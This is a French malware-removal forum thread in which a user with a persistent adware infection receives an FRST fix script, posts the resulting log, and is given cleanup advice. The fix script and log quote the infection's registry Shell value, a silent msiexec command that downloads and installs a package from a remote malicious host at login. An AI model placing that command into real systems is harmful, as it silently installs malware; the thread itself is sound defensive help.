INFECTION PERSISTANTE

Aide à la désinfection pour supprimer les virus, adwares, ransomwares, trojans.

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420M

INFECTION PERSISTANTE

par 420M »

Bonsoir
PAGE ORANGE infectée malgré désinstallation à plusieurs reprises de trojan avec Malwarebytes Anti-Malware (MBAM ) et revo Uninstaller.
Que faire ?
merci.
http://pjjoint.malekal.com/files.php?id ... k12m7u14s8
http://pjjoint.malekal.com/files.php?id ... x15t13j6g9
http://pjjoint.malekal.com/files.php?id ... 3c8v6s15t9
Malekal_morte
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Inscription : 10 sept. 2005 13:57

Re: INFECTION PERSISTANTE

par Malekal_morte »

Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.

Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :

Code : Tout sélectionner

CreateRestorePoint:
CloseProcesses:
Task: {736639A4-55FE-4CB5-AA1F-6CC27B3625AA} - System32\Tasks\{7D26FE1E-F38D-59EA-460D-09B9AF352947} => C:\Users\user\AppData\Roaming\7D26FE1E-F38D-59EA-460D-09B9AF352947\SyncVersion.exe [2013-04-15] ()
C:\Users\user\AppData\Roaming\7D26FE1E-F38D-59EA-460D-09B9AF352947
HKU\S-1-5-21-1892450710-1842687347-3305860735-1002\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1YRkF4MYI2MWMyRkI1MjlQMTMcMWE1NkNYFjM5NWRYFF== /q [Pays US - 104.24.101.133] 
 2017-04-06 10:00 - 2017-04-23 20:00 - 00000280 _____ C:\Windows\Tasks\{7D26FE1E-F38D-59EA-460D-09B9AF352947}.job 
 2017-04-06 10:00 - 2017-04-06 10:00 - 00002618 _____ C:\Windows\System32\Tasks\{7D26FE1E-F38D-59EA-460D-09B9AF352947} 
 2017-04-06 09:59 - 2017-04-18 23:13 - 00000000 ____D C:\Users\user\AppData\Roaming\7D26FE1E-F38D-59EA-460D-09B9AF352947 
 2017-04-06 09:58 - 2017-04-06 10:00 - 00000000 ____D C:\Users\user\AppData\Local\catanafe 
 2017-04-06 09:57 - 2017-04-14 13:12 - 00000000 ____D C:\Users\user\AppData\Roaming\ScreenShot 
 2017-04-06 09:57 - 2017-04-06 09:57 - 00000000 ____D C:\Program Files (x86)\ScreenShot 
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.

Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparait, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
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420M

Re: INFECTION PERSISTANTE

par 420M »

Bonjour.
Un grand merci pour ta réponse. J'ai suivi le "protocole" à la lettre mais à l'étape "clique sur le bouton "corriger / fix" j'ai eu un message de bitdefender m'indiquant le blocage d'un accès malveillant. Depuis je suis bloquée car je n'ai pas vu apparaître le fichier texte que je dois copier/coller pour finaliser la procédure avant le redémarrage. De plus, je constate que FRST a disparu du bureau.
Que dois-je faire ?
Faut-il tout recommencer ?
Je m'interroge sur l'intérêt de bitdefender qui ne pas protéger du trojan.
Merci de porter une attention bienveillante à mon cas.
Malekal_morte
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Inscription : 10 sept. 2005 13:57

Re: INFECTION PERSISTANTE

par Malekal_morte »

C'est maintenant qu'il se réveille.
Désactive BitDefender et refais la correction.
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420M

Re: INFECTION PERSISTANTE

par 420M »

Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 23-04-2017 01
Exécuté par user (25-04-2017 09:37:55) Run:1
Exécuté depuis C:\Users\user\Downloads
Profils chargés: user (Profils disponibles: UpdatusUser & user)
Mode d'amorçage: Normal
==============================================

fixlist contenu:
*****************
CreateRestorePoint:
CloseProcesses:
Task: {736639A4-55FE-4CB5-AA1F-6CC27B3625AA} - System32\Tasks\{7D26FE1E-F38D-59EA-460D-09B9AF352947} => C:\Users\user\AppData\Roaming\7D26FE1E-F38D-59EA-460D-09B9AF352947\SyncVersion.exe [2013-04-15] ()
C:\Users\user\AppData\Roaming\7D26FE1E-F38D-59EA-460D-09B9AF352947
HKU\S-1-5-21-1892450710-1842687347-3305860735-1002\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=z ... M5NWRYFF== /q [Pays US - 104.24.101.133]
2017-04-06 10:00 - 2017-04-23 20:00 - 00000280 _____ C:\Windows\Tasks\{7D26FE1E-F38D-59EA-460D-09B9AF352947}.job
2017-04-06 10:00 - 2017-04-06 10:00 - 00002618 _____ C:\Windows\System32\Tasks\{7D26FE1E-F38D-59EA-460D-09B9AF352947}
2017-04-06 09:59 - 2017-04-18 23:13 - 00000000 ____D C:\Users\user\AppData\Roaming\7D26FE1E-F38D-59EA-460D-09B9AF352947
2017-04-06 09:58 - 2017-04-06 10:00 - 00000000 ____D C:\Users\user\AppData\Local\catanafe
2017-04-06 09:57 - 2017-04-14 13:12 - 00000000 ____D C:\Users\user\AppData\Roaming\ScreenShot
2017-04-06 09:57 - 2017-04-06 09:57 - 00000000 ____D C:\Program Files (x86)\ScreenShot
Hosts:
EmptyTemp:
RemoveProxy:
Reboot:

*****************

Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{736639A4-55FE-4CB5-AA1F-6CC27B3625AA} => clé non trouvé(e).
C:\Windows\System32\Tasks\{7D26FE1E-F38D-59EA-460D-09B9AF352947} => non trouvé(e).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{7D26FE1E-F38D-59EA-460D-09B9AF352947} => clé non trouvé(e).
"C:\Users\user\AppData\Roaming\7D26FE1E-F38D-59EA-460D-09B9AF352947" => non trouvé(e).
HKU\S-1-5-21-1892450710-1842687347-3305860735-1002\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => valeur non trouvé(e).
"C:\Windows\Tasks\{7D26FE1E-F38D-59EA-460D-09B9AF352947}.job" => non trouvé(e).
"C:\Windows\System32\Tasks\{7D26FE1E-F38D-59EA-460D-09B9AF352947}" => non trouvé(e).
"C:\Users\user\AppData\Roaming\7D26FE1E-F38D-59EA-460D-09B9AF352947" => non trouvé(e).
"C:\Users\user\AppData\Local\catanafe" => non trouvé(e).
"C:\Users\user\AppData\Roaming\ScreenShot" => non trouvé(e).
"C:\Program Files (x86)\ScreenShot" => non trouvé(e).
C:\Windows\System32\Drivers\etc\hosts => déplacé(es) avec succès
Hosts restauré(es) avec succès.

========= RemoveProxy: =========

HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-1892450710-1842687347-3305860735-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-1892450710-1842687347-3305860735-1002\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès


========= Fin de RemoveProxy: =========


=========== EmptyTemp: ==========

BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 24206221 B
Java, Flash, Steam htmlcache => 523 B
Windows/system/drivers => 1880 B
Edge => 0 B
Chrome => 0 B
Firefox => 198945309 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 22957 B
systemprofile32 => 205450 B
LocalService => 10844 B
NetworkService => 0 B
UpdatusUser => 0 B
user => 13377436 B

RecycleBin => 0 B
EmptyTemp: => 225.8 MB données temporaires supprimées.

================================

==== Fin de Fixlog 09:39:01 ====
420M

Re: INFECTION PERSISTANTE

par 420M »

je viens de transmettre le fichier texte. En effet en désactivant Bitdefender tout a fonctionné.
Un grand merci pour ton aide.
Malekal_morte
Messages : 113148
Inscription : 10 sept. 2005 13:57

Re: INFECTION PERSISTANTE

par Malekal_morte »

De rien,


Tu peux supprimer le dossier C:\FRST =)

Termine par un nettoyage Malwarebytes Anti-Malware (MBAM ) version gratuite


Quelques conseils :

Pour ne plus te faire avoir.
A lire - Programmes parasites / PUPs : Dossier Adwares/PUPs : programmes indésirables et parasites
(Surtout active les détections LPIs pour détecter les programmes parasites et publicitaires)
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
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